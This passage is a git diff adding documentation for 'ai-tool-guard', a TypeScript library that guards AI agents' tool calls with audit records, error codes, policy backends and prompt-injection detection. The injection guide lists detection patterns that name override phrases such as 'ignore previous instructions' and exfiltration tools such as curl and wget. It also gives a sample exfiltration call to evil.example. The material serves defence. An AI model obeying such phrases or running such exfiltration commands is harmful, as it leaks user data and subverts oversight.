*/ + redactions?: string[]; + /** Wall-clock time spent in policy evaluation, in milliseconds. */ + evalDurationMs: number; + /** Whether this was a dry-run evaluation (no tool was actually executed). */ + dryRun: boolean; +} +``` + +All 12 fields: + +| Field | Type | Always Present | Description | +|---|---|---|---| +| `id` | `string` | Yes | UUIDv4 for correlation across systems. | +| `timestamp` | `string` | Yes | ISO-8601 datetime of the evaluation. | +| `verdict` | `"allow" \| "deny" \| "require-approval"` | Yes | The outcome of policy evaluation. | +| `toolName` | `string` | Yes | The tool that was evaluated. | +| `matchedRules` | `string[]` | Yes | IDs of rules that matched. Empty array means no rules matched (default verdict applied). | +| `riskLevel` | `"low" \| "medium" \| "high" \| "critical"` | Yes | Effective risk level used in evaluation. | +| `riskCategories` | `RiskCategory[]` | Yes | Classification tags for the tool call. | +| `attributes` | `Record<string, unknown>` | Yes | User-supplied context attributes available during evaluation. | +| `reason` | `string` | Yes | Human-readable verdict explanation. | +| `redactions` | `string[]` | No | Field names removed by output filters. Only present when redaction occurred. | +| `evalDurationMs` | `number` | Yes | Time spent in policy evaluation. Excludes tool execution time. | +| `dryRun` | `boolean` | Yes | `true` when the guard is in simulation or dry-run mode. | + +--- + +## The `onDecision` Callback + +Register a callback to receive every `DecisionRecord` as it is produced: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [...], + onDecision: async (record) => { + // Called for every evaluation: allow, deny, and require-approval.
+ console.log(`[${record.verdict}] ${record.toolName} — ${record.reason}`); + }, +}); +``` + +The callback signature is: + +```typescript +onDecision?: (record: DecisionRecord) => void | Promise<void>; +``` + +The callback is `await`ed before the guard pipeline continues, so errors thrown inside it propagate to the caller. If you want non-blocking side effects (e.g., fire-and-forget logging), start the work without returning or awaiting its promise, and handle rejections yourself: + +```typescript +onDecision: (record) => { + // Do not await — fire and forget. + writeToAuditLog(record).catch(console.error); +}, +``` + +!!! warning + `onDecision` is called on every verdict including `allow`. If your callback performs I/O, ensure it is fast or non-blocking. Slow callbacks will add latency to every tool call, including allowed ones. + +--- + +## Use Cases + +### Audit Logging + +Write every decision to a structured log file for compliance and post-hoc analysis: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import fs from 'node:fs'; + +const auditStream = fs.createWriteStream('audit.jsonl', { flags: 'a' }); + +const guard = createToolGuard({ + rules: [...], + onDecision: (record) => { + auditStream.write(JSON.stringify(record) + '\n'); + }, +}); +``` + +Each line in the output is a complete, self-contained JSON object. The `id` field enables joining these records with OTel spans, application logs, and approval system events. + +### Alerting on Denials + +Send denied decisions to an alerting system in real time: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import { alerting } from './alerting.js'; + +const guard = createToolGuard({ + rules: [...], + onDecision: async (record) => { + if (record.verdict === 'deny') { + await alerting.send({ + severity: record.riskLevel === 'critical' ?
'critical' : 'warning', + title: `Tool blocked: ${record.toolName}`, + body: record.reason, + metadata: { + decisionId: record.id, + matchedRules: record.matchedRules, + riskLevel: record.riskLevel, + attributes: record.attributes, + }, + }); + } + }, +}); +``` + +### Compliance Reporting + +Collect decision records for a compliance dashboard that tracks tool usage, risk distribution, and denial rates: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import type { DecisionRecord } from 'ai-tool-guard'; + +const dailyStats = { + total: 0, + byVerdict: { allow: 0, deny: 0, 'require-approval': 0 }, + byRiskLevel: {} as Record<string, number>, + evalDurationTotal: 0, +}; + +const guard = createToolGuard({ + rules: [...], + onDecision: (record) => { + dailyStats.total++; + dailyStats.byVerdict[record.verdict]++; + dailyStats.byRiskLevel[record.riskLevel] = + (dailyStats.byRiskLevel[record.riskLevel] ?? 0) + 1; + dailyStats.evalDurationTotal += record.evalDurationMs; + }, +}); +``` + +### Combining with OTel Spans + +The `id` field on each `DecisionRecord` is a UUIDv4 that can be attached to OTel spans as a custom attribute, enabling correlation between the structured audit log and distributed traces: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import { createTracer, ATTR } from 'ai-tool-guard/otel'; + +const tracer = createTracer({ tracerName: 'my-service' }); + +const guard = createToolGuard({ + rules: [...], + otel: { enabled: true }, + onDecision: (record) => { + // Create a child span keyed to the decision ID. + const span = tracer.startSpan('my_service.tool_decision', { + attributes: { + [ATTR.DECISION_VERDICT]: record.verdict, + [ATTR.TOOL_NAME]: record.toolName, + 'decision.id': record.id, // Correlates with audit log entries. + }, + }); + span.end(); + }, +}); +``` + +--- + +## Field Details + +### Correlation via `id` + +The `id` is a UUIDv4 generated per evaluation.
Use it as a foreign key when joining: + +- Audit log entries (written via `onDecision`) +- OTel spans (attach as a custom attribute, as shown above) +- Approval system records (the `ApprovalToken` contains `toolName` and `originalArgs` for cross-referencing) +- `ToolGuardError.decision.id` for errors caught at the call site + +### Duration Tracking via `evalDurationMs` + +`evalDurationMs` measures wall-clock time from the start of `evaluatePolicy()` to the point the record is produced. It does not include: + +- Time spent in `resolveUserAttributes()` or `resolveConversationContext()` +- Time spent waiting for approval (measured separately via the `approval_wait` OTel span) +- Tool execution time (measured via the `tool_execute` OTel span) + +Use this field to detect slow policy rules, especially those with async `condition` callbacks calling external services. + +### Redaction Tracking via `redactions` + +When output filters redact fields from a tool result, the names of those fields are recorded in the `redactions` array on the decision record. This makes it possible to audit what data was removed even though the redacted values themselves are not stored. + +```typescript +// Example: a decision record after output filtering. +const record = { + id: 'a1b2c3d4-...', + verdict: 'allow', + toolName: 'queryUser', + redactions: ['ssn', 'creditCardNumber'], + // ... +}; +``` + +`redactions` is `undefined` (not an empty array) when no redaction occurred, so check it with `(record.redactions?.length ?? 0) > 0`. A bare `record.redactions?.length > 0` does not compile under `strictNullChecks` because the left-hand side may be `undefined`. + +--- + +## Advanced Examples + +### Per-Tool Decision Aggregation + +Track per-tool metrics for a usage analytics system: + +```typescript +const toolStats = new Map<string, { calls: number; denials: number }>(); + +const guard = createToolGuard({ + rules: [...], + onDecision: (record) => { + const existing = toolStats.get(record.toolName) ??
{ calls: 0, denials: 0 }; + existing.calls++; + if (record.verdict === 'deny') existing.denials++; + toolStats.set(record.toolName, existing); + }, +}); + +// Expose as a health check endpoint. +function getToolStats() { + return Object.fromEntries(toolStats.entries()); +} +``` + +### Decision Record Forwarding to External Audit System + +Buffer and batch-send decision records to an external audit service: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import type { DecisionRecord } from 'ai-tool-guard'; + +const buffer: DecisionRecord[] = []; + +setInterval(async () => { + if (buffer.length === 0) return; + const batch = buffer.splice(0, buffer.length); + await auditService.ingestBatch(batch); +}, 5000); + +const guard = createToolGuard({ + rules: [...], + onDecision: (record) => { + buffer.push(record); + }, +}); +``` + +--- + +## How It Works + +1. The policy engine (`evaluatePolicy()`) runs all matching rules, applies the external backend if configured, and assembles a `DecisionRecord` with the final verdict, matched rule IDs, risk classification, and a reason string. The `evalDurationMs` is calculated using `performance.now()` around this evaluation. +2. The record's `id` is a randomly generated UUIDv4 produced per evaluation. +3. The guard calls `onDecision(record)` and awaits the result before proceeding to the verdict handling phase. +4. If the verdict is `deny` and the guard is not in dry-run mode, a `ToolGuardError` is thrown with `err.decision` set to the same record. +5. After tool execution completes and output filters run, any redacted field names are appended to `record.redactions`. The record passed to `onDecision` reflects the state at evaluation time, before output filtering — redactions are available on the error's decision record when output filtering occurs post-execution. 
+ +--- + +## Related + +- [OpenTelemetry](opentelemetry.md) +- [Output Filtering](output-filtering.md) +- [API Reference — Types](../api/types.md) diff --git a/docs/guides/error-handling.md b/docs/guides/error-handling.md new file mode 100644 index 0000000..5816b1b --- /dev/null +++ b/docs/guides/error-handling.md @@ -0,0 +1,278 @@ +# Error Handling + +## Overview + +When ai-tool-guard blocks a tool call — whether due to a policy denial, a failed approval, rate limiting, argument validation, injection detection, or output filtering — it throws a `ToolGuardError`. All guard-originated errors derive from this single class, making it straightforward to distinguish guard failures from errors thrown by your own tool implementations. + +`ToolGuardError` extends the built-in `Error` class and adds three fields: a machine-readable `code`, the `toolName` that was involved, and an optional `decision` containing the full `DecisionRecord` that produced the verdict. + +--- + +## Basic Usage + +Wrap tool calls in a `try/catch` block and check `instanceof ToolGuardError` to distinguish guard errors from other exceptions: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +try { + const result = await guardedTools.deleteRecord.execute(args, execOptions); +} catch (err) { + if (err instanceof ToolGuardError) { + console.error(`Guard blocked the call: [${err.code}] ${err.message}`); + // Handle the specific guard failure. + } else { + // Re-throw unexpected errors. + throw err; + } +} +``` + +--- + +## `ToolGuardError` Class + +```typescript +class ToolGuardError extends Error { + readonly name: 'ToolGuardError'; + readonly code: ToolGuardErrorCode; + readonly toolName: string; + readonly decision?: DecisionRecord; +} +``` + +| Field | Type | Description | +|---|---|---| +| `name` | `string` | Always `"ToolGuardError"`. Useful for logging and serialization. | +| `message` | `string` | Human-readable explanation of why the call was blocked, suitable for logging. 
| +| `code` | `ToolGuardErrorCode` | Machine-readable error category. Use this in `switch` statements. | +| `toolName` | `string` | The name of the tool that was being invoked when the error occurred. | +| `decision` | `DecisionRecord \| undefined` | The full decision record for policy-originated errors. Present on `policy-denied` and `approval-denied`. | + +--- + +## Error Codes + +```typescript +type ToolGuardErrorCode = + | 'policy-denied' + | 'approval-denied' + | 'no-approval-handler' + | 'arg-validation-failed' + | 'injection-detected' + | 'rate-limited' + | 'output-blocked' + | 'mcp-drift'; +``` + +| Code | Description | Typical Cause | +|---|---|---| +| `policy-denied` | The policy engine returned a `deny` verdict. | A rule matched the tool call and its condition evaluated to `true`. | +| `approval-denied` | The approval handler returned `approved: false`. | A human operator rejected the tool call in the approval UI. | +| `no-approval-handler` | A `require-approval` verdict was issued but no `onApprovalRequired` handler is configured. | The guard was set up without an approval handler, but a rule requires one. | +| `arg-validation-failed` | One or more `argGuards` rejected the arguments. | An argument value failed a type check, range check, or custom validation. | +| `injection-detected` | The injection detector scored the arguments above the configured threshold with an `action` of `deny`. | Arguments contained patterns associated with prompt injection. | +| `rate-limited` | The tool exceeded its configured call rate or concurrency limit. | Too many calls in the time window, or the concurrency cap is reached. | +| `output-blocked` | An output filter returned a `block` verdict after the tool executed. | The tool result matched a pattern that must not be returned to the model. | +| `mcp-drift` | An MCP schema fingerprint mismatch was detected before execution. | A tool schema changed since it was pinned. 
| + +--- + +## Accessing the `DecisionRecord` + +For `policy-denied` and `approval-denied` errors, `err.decision` contains the complete `DecisionRecord`. This includes the matched rule IDs, risk level, risk categories, and evaluation duration: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +try { + await guardedTools.sendEmail.execute(args, execOptions); +} catch (err) { + if (err instanceof ToolGuardError && err.code === 'policy-denied') { + const record = err.decision!; + console.log('Verdict:', record.verdict); + console.log('Matched rules:', record.matchedRules.join(', ')); + console.log('Risk level:', record.riskLevel); + console.log('Reason:', record.reason); + console.log('Eval duration:', record.evalDurationMs, 'ms'); + } +} +``` + +For all other error codes, `err.decision` is `undefined`. + +--- + +## Handling All Error Codes + +Use a `switch` statement on `err.code` to handle each error type distinctly: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +async function runToolSafely(name: string, args: unknown) { + try { + return await guardedTools[name].execute(args, execOptions); + } catch (err) { + if (!(err instanceof ToolGuardError)) throw err; + + switch (err.code) { + case 'policy-denied': + return { + error: 'This action is not permitted by your current access policy.', + ruleIds: err.decision?.matchedRules, + }; + + case 'approval-denied': + return { + error: 'The action was reviewed and rejected by an operator.', + }; + + case 'no-approval-handler': + // Configuration error — log loudly, do not expose to end users. + console.error('Guard misconfigured: approval required but no handler set.'); + return { error: 'This action requires approval, which is not configured.' 
}; + + case 'arg-validation-failed': + return { + error: `The arguments provided to "${err.toolName}" are invalid.`, + detail: err.message, + }; + + case 'injection-detected': + return { + error: 'The request was blocked due to suspected prompt injection.', + }; + + case 'rate-limited': + return { + error: `"${err.toolName}" is being called too frequently. Please wait and try again.`, + }; + + case 'output-blocked': + return { + error: 'The result of this action cannot be returned due to output policy.', + }; + + case 'mcp-drift': + return { + error: 'The tool schema has changed and must be re-validated before use.', + }; + + default: + throw err; + } + } +} +``` + +--- + +## Advanced Examples + +### Error Reporting and Monitoring + +Send blocked calls to your monitoring platform for alerting and trend analysis: + +```typescript +import { createToolGuard, ToolGuardError } from 'ai-tool-guard'; +import { metrics, monitoring } from './monitoring.js'; + +const guard = createToolGuard({ + rules: [...], + onDecision: async (record) => { + if (record.verdict !== 'allow') { + await metrics.increment('tool_guard.blocked', { + tool: record.toolName, + verdict: record.verdict, + riskLevel: record.riskLevel, + rules: record.matchedRules.join(','), + }); + } + }, +}); + +// At the call site, report guard errors with their code and decision ID, then re-throw. +try { + await guardedTool.execute(args, execOptions); +} catch (err) { + if (err instanceof ToolGuardError) { + await monitoring.reportEvent('tool_guard_error', { + code: err.code, + toolName: err.toolName, + decisionId: err.decision?.id, + message: err.message, + }); + } + throw err; +} +``` + +### Graceful Degradation + +Fall back to a safe alternative when the primary tool is blocked: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +async function readUserData(userId: string) { + try { + // Try full record read. 
+ return await guardedTools.readFullRecord.execute({ userId }, execOptions); + } catch (err) { + if (err instanceof ToolGuardError && err.code === 'policy-denied') { + // Fall back to redacted summary if full read is not permitted. + return await guardedTools.readSummary.execute({ userId }, execOptions); + } + throw err; + } +} +``` + +### User-Friendly Error Messages + +Translate guard errors into user-facing messages keyed on error code, keeping internal details out of the AI response: + +```typescript +import { ToolGuardError } from 'ai-tool-guard'; + +const userMessages: Record<string, string> = { + 'policy-denied': 'I am not permitted to perform that action.', + 'approval-denied': 'That action was not approved.', + 'rate-limited': 'I have reached the limit for that action. Please try again shortly.', + 'injection-detected': 'That request cannot be processed.', + 'output-blocked': 'I cannot share that information.', + 'arg-validation-failed': 'The parameters for that action are not valid.', + 'mcp-drift': 'That tool is temporarily unavailable.', + 'no-approval-handler': 'That action requires approval, which is not available right now.', +}; + +function toUserMessage(err: unknown): string { + if (err instanceof ToolGuardError) { + return userMessages[err.code] ?? 'That action could not be completed.'; + } + return 'An unexpected error occurred.'; +} +``` + +--- + +## How It Works + +`ToolGuardError` is thrown directly by the `ToolGuard` execution pipeline at the point where a guard check fails: + +- **Injection check** — thrown before argument guards if `injectionDetection.action === 'deny'` and the score exceeds the threshold. +- **Argument guards** — thrown if any `argGuard` validation function returns a non-null reason string. +- **Policy evaluation** — thrown after `evaluatePolicy()` returns a `deny` verdict (not in dry-run mode). The `DecisionRecord` from evaluation is attached as `err.decision`. 
+- **Approval flow** — thrown if the approval handler returns `approved: false`, or if no handler is configured for a `require-approval` verdict. +- **Rate limiting** — thrown if the rate limiter's `acquire()` call returns `allowed: false`. +- **Output filtering** — thrown after tool execution if a filter returns a `block` verdict. + +Errors from the tool's own `execute()` function are not wrapped — they propagate as-is. Only errors originating from the guard pipeline produce `ToolGuardError` instances. + +--- + +## Related + +- [API Reference — Core](../api/core.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/external-backends.md b/docs/guides/external-backends.md new file mode 100644 index 0000000..7b966a1 --- /dev/null +++ b/docs/guides/external-backends.md @@ -0,0 +1,249 @@ +# External Backends + +`ai-tool-guard` can delegate policy decisions to an external engine — Open Policy Agent (OPA), AWS Cedar, a custom database-backed ABAC system, or any other service — through the `PolicyBackend` interface. The external backend is evaluated first; built-in rules then apply with escalation semantics on top of the backend result. + +## Overview + +External backends are useful when: + +- Your organisation already maintains policy definitions in OPA/Rego or Cedar. +- Policy must be managed centrally and consumed by multiple services. +- Access decisions depend on data that lives in an external store (e.g. a permissions database). +- Audit requirements mandate a single authoritative policy engine. + +## Basic Usage + +Implement the `PolicyBackend` interface and pass the instance as `backend` in `GuardOptions`: + +```ts +import { createToolGuard } from "ai-tool-guard"; +import type { PolicyBackend, PolicyContext, PolicyBackendResult } from "ai-tool-guard"; + +const myBackend: PolicyBackend = { + name: "my-policy-service", + async evaluate(ctx: PolicyContext): Promise<PolicyBackendResult> { + // Call your external service and return a result. 
+ return { + verdict: "allow", + reason: "Policy service approved the call.", + matchedRules: ["policy-service:rule-42"], + }; + }, +}; + +const guard = createToolGuard({ backend: myBackend }); +``` + +## Configuration Options + +### `PolicyBackend` + +| Property | Type | Description | +|---|---|---| +| `name` | `string` | Unique name used in logs and traces. | +| `evaluate` | `(ctx: PolicyContext) => Promise<PolicyBackendResult>` | Called for every tool invocation before built-in rules run. | + +### `PolicyBackendResult` + +| Property | Type | Required | Description | +|---|---|---|---| +| `verdict` | `DecisionVerdict` | Yes | `"allow"`, `"deny"`, or `"require-approval"`. | +| `reason` | `string` | Yes | Human-readable explanation recorded in `DecisionRecord.reason`. | +| `matchedRules` | `string[]` | Yes | Identifiers of the rules that fired (for audit). | +| `attributes` | `Record<string, unknown>` | No | Additional metadata merged into `DecisionRecord.attributes`. | + +### `PolicyContext` (input to the backend) + +The context object passed to `evaluate` contains: + +| Field | Type | Description | +|---|---|---| +| `toolName` | `string` | Name of the tool being invoked. | +| `args` | `Record<string, unknown>` | Arguments the model wants to pass to the tool. | +| `userAttributes` | `Record<string, unknown>` | Caller-supplied attributes (user ID, roles, tenant, etc.). | +| `conversation` | `ConversationContext \| undefined` | Session-level metadata such as `riskScore` and `priorFailures`. | +| `dryRun` | `boolean \| undefined` | Whether this is a simulation evaluation. | + +## Advanced Examples + +### OPA / Rego Backend + +The following example calls a locally running OPA server using the REST API. The Rego policy receives the tool name and user attributes and returns a decision object. 
+ +```ts +import type { PolicyBackend, PolicyContext, PolicyBackendResult } from "ai-tool-guard"; + +// Example Rego policy (data.toolguard.authz): +// +// package toolguard.authz +// +// default allow = false +// +// allow { +// input.user.roles[_] == "admin" +// } +// +// allow { +// input.tool.riskLevel == "low" +// } + +const opaBackend: PolicyBackend = { + name: "opa", + async evaluate(ctx: PolicyContext): Promise<PolicyBackendResult> { + const response = await fetch("http://localhost:8181/v1/data/toolguard/authz", { + method: "POST", + headers: { "Content-Type": "application/json" }, + body: JSON.stringify({ + input: { + tool: { name: ctx.toolName }, + user: ctx.userAttributes, + args: ctx.args, + }, + }), + }); + + if (!response.ok) { + throw new Error(`OPA returned HTTP ${response.status}`); + } + + const body = await response.json() as { result?: { allow?: boolean; reason?: string } }; + const result = body.result ?? {}; + const allowed = result.allow ?? false; + + return { + verdict: allowed ? "allow" : "deny", + reason: result.reason ?? (allowed ? "OPA policy approved." : "OPA policy denied."), + matchedRules: ["opa:toolguard/authz"], + }; + }, +}; + +const guard = createToolGuard({ backend: opaBackend }); +``` + +!!! tip "Dry-run forwarding" + Forward `ctx.dryRun` to your OPA input so the policy server can log simulation evaluations separately from real ones. 
+ +### Database-Backed ABAC + +For teams that store permissions in a relational database, a custom backend can query the database and translate rows into verdicts: + +```ts +import type { PolicyBackend, PolicyContext, PolicyBackendResult } from "ai-tool-guard"; + +interface Permission { + toolPattern: string; + verdict: "allow" | "deny" | "require-approval"; + reason: string; +} + +function createDatabaseBackend(db: DatabaseClient): PolicyBackend { + return { + name: "database-abac", + async evaluate(ctx: PolicyContext): Promise<PolicyBackendResult> { + const userId = ctx.userAttributes["userId"] as string | undefined; + if (!userId) { + return { + verdict: "deny", + reason: "No user identity present in request.", + matchedRules: ["db-abac:no-identity"], + }; + } + + // Query the permissions table for this user and tool. + const permissions: Permission[] = await db.query( + `SELECT tool_pattern, verdict, reason + FROM tool_permissions + WHERE user_id = $1 + AND $2 LIKE tool_pattern + ORDER BY priority DESC + LIMIT 1`, + [userId, ctx.toolName], + ); + + if (permissions.length === 0) { + return { + verdict: "deny", + reason: `No permission record found for user "${userId}" and tool "${ctx.toolName}".`, + matchedRules: [], + }; + } + + const { verdict, reason } = permissions[0]; + return { + verdict, + reason, + matchedRules: [`db-abac:user:${userId}:tool:${ctx.toolName}`], + attributes: { userId, source: "database-abac" }, + }; + }, + }; +} + +const guard = createToolGuard({ + backend: createDatabaseBackend(myDatabaseClient), +}); +``` + +### Combining a Backend with Built-In Rules + +You can layer built-in rules on top of a backend. The engine applies escalation: if the built-in rules produce a stricter verdict than the backend, the stricter verdict wins. + +```ts +import { createToolGuard, deny } from "ai-tool-guard"; + +const guard = createToolGuard({ + backend: opaBackend, + rules: [ + // Hard deny for critical tools regardless of what OPA says. 
+ deny({ + tools: "*", + riskLevels: ["critical"], + description: "Critical tools are always denied, even if OPA permits them.", + priority: 1000, + }), + ], +}); +``` + +!!! warning "Built-in rules can only escalate, not relax" + If the backend returns `"deny"`, a built-in `allow` rule will not override it. Escalation is unidirectional: `deny > require-approval > allow`. To relax a backend decision, you must update the backend policy itself. + +## How It Works + +The backend integration is handled in `evaluatePolicy` (`src/policy/engine.ts`): + +1. **Backend called first** — `options.backend.evaluate(ctx)` is awaited. Its returned `verdict`, `reason`, `matchedRules`, and `attributes` become the initial values for the decision record. + +2. **Built-in rules run unconditionally** — Even when a backend is configured, the built-in rules array is evaluated. The engine checks whether the rules verdict is stricter than the backend verdict using a severity map: `deny (2) > require-approval (1) > allow (0)`. + +3. **Escalation applied** — If the built-in rules produce a stricter verdict, the record is updated with the new verdict, reason, and matched rule IDs. The backend's matched rule IDs are preserved and merged. + +4. **Error handling** — If `backend.evaluate` throws, the exception propagates to the caller. The guard does not silently fall back to `allow` on backend errors. Wrap your backend implementation in a try/catch if you need a fallback posture: + +```ts +const resilientBackend: PolicyBackend = { + name: "resilient-opa", + async evaluate(ctx: PolicyContext): Promise<PolicyBackendResult> { + try { + return await opaBackend.evaluate(ctx); + } catch (err) { + // Fail closed: deny on backend error. + console.error("OPA backend error:", err); + return { + verdict: "deny", + reason: "Policy backend unavailable; failing closed.", + matchedRules: ["resilient-opa:fallback-deny"], + }; + } + }, +}; +``` + +!!! 
note "Only one backend at a time" + `GuardOptions.backend` accepts a single `PolicyBackend` instance. To fan out to multiple backends, implement a composite backend that calls each service and merges results internally before returning a single `PolicyBackendResult`. + +## Related + +- [Policy Engine](policy-engine.md) — evaluation order, escalation mechanics, and `DecisionRecord` structure. +- [API Reference](../api/policy.md) — full type documentation for `PolicyBackend`, `PolicyBackendResult`, and `PolicyContext`. diff --git a/docs/guides/injection-detection.md b/docs/guides/injection-detection.md new file mode 100644 index 0000000..c1dcee5 --- /dev/null +++ b/docs/guides/injection-detection.md @@ -0,0 +1,232 @@ +# Injection Detection + +Prompt injection is the primary attack vector against AI agents: an adversary embeds instructions in data that the model reads and the agent then passes as arguments to tools. ai-tool-guard runs an injection check at the tool boundary — before arg validation and before policy evaluation — so that suspicious calls can be blocked or escalated regardless of which policy rules would otherwise apply. + +## Overview + +The injection check runs first in the evaluation pipeline. It scores the tool arguments for adversarial patterns and, depending on configuration, either blocks the call outright, downgrades it to require human approval, or logs it and proceeds. The check is optional and opt-in: configure `injectionDetection` on `GuardOptions` to enable it. + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [{ id: "allow-low", toolPatterns: ["*"], verdict: "allow" }], + injectionDetection: { + threshold: 0.5, + action: "deny", + }, +}); +``` + +## Basic Usage + +Pass an `InjectionDetectorConfig` as `injectionDetection` in `GuardOptions`. The check applies to every tool call managed by that guard instance. 
+ +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [/* ... */], + injectionDetection: { + threshold: 0.6, // suspicion score required to trigger + action: "deny", // what to do when triggered + }, +}); +``` + +When the check triggers with the `deny` action, the tool call receives a `DecisionRecord` with `verdict: "deny"` and the caller receives a `ToolGuardError` with `code: "injection-detected"`. With the `downgrade` action, the verdict becomes `"require-approval"` and the call moves to the approval flow instead of failing immediately. + +## Configuration Options + +### `InjectionDetectorConfig` + +| Field | Type | Default | Description | +|---|---|---|---| +| `threshold` | `number` (0–1) | `0.5` | Suspicion score at or above which the action fires. | +| `action` | `"deny" \| "downgrade" \| "log"` | `"log"` | What to do when `score >= threshold`. | +| `detect` | `(args) => number \| Promise<number>` | built-in heuristic | Custom detector function. | + +### Actions + +**`deny`** — Blocks the call entirely. The tool is never executed. Use this for public-facing tools where any injection signal should be treated as a hard block. + +**`downgrade`** — Converts the verdict to `"require-approval"`. The call proceeds to the approval flow, where a human can inspect the arguments before allowing execution. Use this when you want oversight rather than a blanket block. + +**`log`** — Records the injection score on the `DecisionRecord` but does not change the verdict. The tool call continues through normal policy evaluation. Use this for monitoring and tuning before enforcing stricter actions. + +## Built-in Heuristic Detector + +When no custom `detect` function is provided, the built-in heuristic detector runs. It flattens all string values in the args object into a single text blob (up to 10 levels of nesting) and tests it against a set of weighted patterns. 
+ +### Pattern Categories + +| Category | Example Patterns | Max Weight | +|---|---|---| +| Instruction override | `ignore previous instructions`, `disregard all prior` | 0.85–0.9 | +| Role hijacking | `you are now a`, `new instructions:`, `system prompt` | 0.6–0.75 | +| Delimiter injection | ` ```system `, ``, `` | 0.7–0.8 | +| Role-play / persona | `act as`, `pretend you're` | 0.5–0.6 | +| Data exfiltration | `fetch`, `curl`, `wget`, `http://`, `https://` | 0.4 | +| Encoded payloads | `base64_decode`, `\xNN` hex escapes | 0.4–0.5 | + +### Scoring Algorithm + +The detector returns the **maximum weight** of any pattern that matches — it does not sum weights. This means a single high-confidence pattern (`"ignore previous instructions"`, weight 0.9) scores 0.9 regardless of how many other patterns also appear. + +``` +score = max(weight for each matching pattern) +``` + +Additionally, if the flattened text exceeds **5000 characters**, the score is raised to at least `0.3`. This length heuristic catches payloads that attempt to overwhelm context without using recognizable injection phrases. + +The final score is clamped to `[0, 1]`. 
+ +### Example Scores + +| Input | Score | Reason | +|---|---|---| +| `"list all files in /tmp"` | 0.0 | No patterns match | +| `"fetch http://evil.example/exfil?d=..."` | 0.4 | Data exfiltration pattern | +| `"ignore previous instructions and ..."` | 0.9 | Instruction override | +| 6000-character string with no patterns | 0.3 | Length heuristic | + +## Custom Detector + +Replace the built-in heuristic with your own scoring function — including an LLM-as-judge approach — by providing `detect`: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + injectionDetection: { + threshold: 0.7, + action: "deny", + async detect(args) { + // Example: call an LLM classifier + const text = JSON.stringify(args); + const score = await myInjectionClassifier.score(text); + return score; // must be 0-1 + }, + }, +}); +``` + +When `detect` is provided, the built-in heuristic does not run. The function receives the raw `args` object and must return a number between 0 and 1. It can be async. + +!!! tip "LLM-as-judge" + A small, fast model dedicated to injection classification can be significantly more accurate than regex heuristics for sophisticated attacks. Use the custom detector to integrate one. Keep latency in mind: the injection check blocks tool execution until the detector resolves. + +## Pipeline Position + +The injection check runs **first** in the evaluation pipeline, before argument validation and before policy evaluation: + +``` +Tool call received + | + v +[1] Injection check <-- checkInjection() runs here + | + v (if not blocked) +[2] Arg guards <-- evaluateArgGuards() + | + v +[3] Policy evaluation <-- PolicyEngine.evaluate() + | + v +[4] Tool execution + | + v +[5] Output filters +``` + +This ordering means a call blocked by the injection check (`action: "deny"`) never reaches policy evaluation or tool execution, even if a policy rule would otherwise allow it. With `"downgrade"` or `"log"`, the call continues through the remaining stages. 
+ +## Advanced Examples + +### Strict Mode for a Public-Facing Tool + +For tools that accept user-controlled input directly, use a low threshold and the `deny` action: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [{ id: "default-allow", toolPatterns: ["*"], verdict: "allow" }], + injectionDetection: { + threshold: 0.4, // Lower than default — fail safe for public exposure. + action: "deny", + }, +}); + +// This tool accepts raw user text, so strict injection blocking applies. +const wrappedSearch = guard.guardTool("search", searchTool, { riskLevel: "medium" }); +``` + +### Relaxed Monitoring for Internal Tools + +For tools called from trusted internal services, use `"log"` to collect data without blocking: + +```typescript +const guard = createToolGuard({ + rules: [{ id: "internal-allow", toolPatterns: ["internal.*"], verdict: "allow" }], + injectionDetection: { + threshold: 0.5, + action: "log", // Flag in DecisionRecord but do not block. + }, + onDecision(record) { + if (record.attributes.injectionScore) { + metrics.histogram("injection.score", record.attributes.injectionScore as number); + } + }, +}); +``` + +### Downgrade to Approval for High-Risk Tools + +For high-risk tools, route suspected injections to a human approver rather than blocking outright: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + injectionDetection: { + threshold: 0.5, + action: "downgrade", // Converts verdict to require-approval. + }, + async onApprovalRequired(token) { + // Send to your approval UI. + return await approvalQueue.submit(token); + }, +}); + +const wrappedDeleteTool = guard.guardTool("deleteRecord", deleteRecordTool, { + riskLevel: "critical", + riskCategories: ["data-delete"], +}); +``` + +## How It Works + +`checkInjection(ctx, config)` is the internal function that runs the check: + +1. 
If a custom `detect` function is configured, call it with `ctx.args` and await the result. +2. Otherwise, run `heuristicDetect(ctx.args)`: + - Flatten all string values in `args` into a single string (recursively, up to depth 10). + - Test the string against each pattern in `INJECTION_PATTERNS`. + - Record the maximum matched weight. + - If the string exceeds 5000 characters, ensure the score is at least 0.3. +3. Compare `score` to `config.threshold` (default `0.5`). If `score >= threshold`, `suspected` is `true`. +4. Map the action to a verdict override: + - `"deny"` → `verdictOverride: "deny"` + - `"downgrade"` → `verdictOverride: "require-approval"` + - `"log"` → no override, call proceeds +5. The result `{ score, suspected, action, verdictOverride }` is returned to the evaluation pipeline. + +The injection score is recorded in the `DecisionRecord`'s `attributes` map under `injectionScore` for observability. + +## Related + +- [API Reference — Guards](../api/guards.md) +- [Argument Validation](argument-validation.md) +- [Approval Workflows](approval-workflows.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/mcp-drift-detection.md b/docs/guides/mcp-drift-detection.md new file mode 100644 index 0000000..4149f5a --- /dev/null +++ b/docs/guides/mcp-drift-detection.md @@ -0,0 +1,313 @@ +# MCP Drift Detection + +## Overview + +Model Context Protocol (MCP) servers expose tools dynamically. When a server updates a tool's schema — changing parameter types, adding required fields, or removing arguments — an AI agent that cached the old schema may call the tool with malformed arguments, or worse, receive unexpected data it 